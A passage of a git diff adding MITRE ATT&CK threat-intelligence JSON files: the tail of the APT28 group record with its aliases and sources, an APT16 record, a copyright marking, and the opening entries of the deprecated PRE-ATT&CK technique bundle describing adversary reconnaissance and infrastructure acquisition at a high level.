(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127) (Citation: ESET Sednit Part 3)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. 
Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "source_name": "Ars Technica GRU indictment Jul 2018" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "source_name": "SecureWorks TG-4127" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. 
Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." + }, + { + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", + "source_name": "ESET Zebrocy May 2019" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). 
En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "source_name": "Talos Seduploader Oct 2017" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018." + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." + }, + { + "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", + "source_name": "Microsoft STRONTIUM Aug 2019" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." 
+ } + ], + "aliases": [ + "APT28", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "modified": "2020-10-06T23:32:21.793Z", + "created": "2017-05-31T21:31:48.664Z", + "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "x_mitre_version": "3.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70.json new file mode 100644 index 0000000000000000000000000000000000000000..1ab04b21beedc1dc39d435997290ae4c4176f002 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70.json 
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--4ca310bf-b934-429e-ab71-a533923a1eb5", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT16", + "description": "[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0023", + "external_id": "G0023" + }, + { + "source_name": "APT16", + "description": "(Citation: FireEye EPS Awakens Part 2)" + }, + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + } + ], + "aliases": [ + "APT16" + ], + "modified": "2020-10-12T19:54:58.537Z", + "created": "2017-05-31T21:31:56.270Z", + "x_mitre_version": "1.1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/pre-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..58ba7ac5d21770b9c7363840c1a07f8062d1f6b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json 
@@ -0,0 +1,17 @@ +{ + "type": "bundle", + "id": "bundle--2434d2f8-1824-4225-bc22-527cd0a454cc", + "spec_version": "2.0", + "objects": [ + { + "type": "marking-definition", + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-06-01T00:00:00Z", + "definition_type": "statement", + "definition": { + "statement": "Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + } + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/pre-attack.json b/cti-ATT-CK-v13.1/pre-attack/pre-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..3a1469890ae1a699f8ba0d7c7b95451ad72efe5d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/pre-attack.json 
@@ -0,0 +1,8724 @@ +{ + "type": "bundle", + "id": "bundle--58c38583-fcc5-49ed-8a05-0dfe305e0c41", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).\n\nOpen source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1266", + "external_id": "T1266" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Possible to gather digital intelligence about a person is easily aided by social networking sites, free/for fee people search engines, and publicly available information (e.g., county databases on tickets/DUIs).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1043", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1247).\n\nOpen source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1247", + "external_id": "T1247" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). 
RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain. Direct access to the selected target is not required for the adversary to conduct this technique. There is a limited ability to detect this by looking at referrer fields on local web site accesses (e.g., a person who has accessed your web servers from [https://www.shodan.io Shodan]).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Possible to gather technical intelligence about Internet accessible systems/devices by obtaining various commercial data sets and supporting business intelligence tools for ease of analysis. Commercial data set examples include advertising content delivery networks, Internet mapping/traffic collections, system fingerprinting data sets, device fingerprinting data sets, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1024", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1277).\n\nData sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1277", + "external_id": "T1277" + }, + { + "source_name": "SANSThreatProfile", + "description": "Stephen Irwin. (2014, September 8). Creating a Threat Profile for Your Organization. Retrieved March 5, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + }, + { + "source_name": "isight-osint", + "description": "Dawn Lomer. (2017). 101+ OSINT Resources for Investigators. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). 
Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1054", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1329).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1329", + "external_id": "T1329" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. 
Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1106", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Wide variety of cloud/VPS/hosting/compute/storage solutions available for adversary to acquire freely or at a low cost.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Hard to differentiate from standard business operations.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. 
(Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1307", + "external_id": "T1307" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1084", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1308", + "external_id": "T1308" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + }, + { + "source_name": "Nemucod Facebook", + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. Retrieved March 28, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1085", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1330", + "external_id": "T1330" + }, + { + "source_name": "LOWBALL2015", + "description": "FireEye Threat Intelligence. (2015, December 1). 
China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1107", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).\n\nCode signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1310", + "external_id": "T1310" + }, + { + "description": "Brad Arkin. 
(2012, September 27). Inappropriate Use of Adobe Code Signing Certificate. Retrieved March 28, 2017.", + "source_name": "Adobe Code Signing Cert" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1087", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).\n\nCode signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. 
Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1332", + "external_id": "T1332" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1109", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b3f36317-3940-4d71-968f-e11ac1bf6a31", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Aggregate individual's digital footprint", + "description": "This object is deprecated as its content has been merged into the enterprise domain. 
Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1275).\n\nIn addition to a target's social media presence may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary familiar with a target's username can mine to determine the target's larger digital footprint via publicly available sources. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1275", + "external_id": "T1275" + }, + { + "source_name": "DigitalFootprint", + "description": "Christopher Budd. (2016, June 27). The importance of understanding your digital footprint. Retrieved May 4, 2017." + }, + { + "source_name": "trendmicro-vtech", + "description": "Christopher Budd. (2015, December 1). Understanding the Risks of the VTech Data Breach. Retrieved May 9, 2017." 
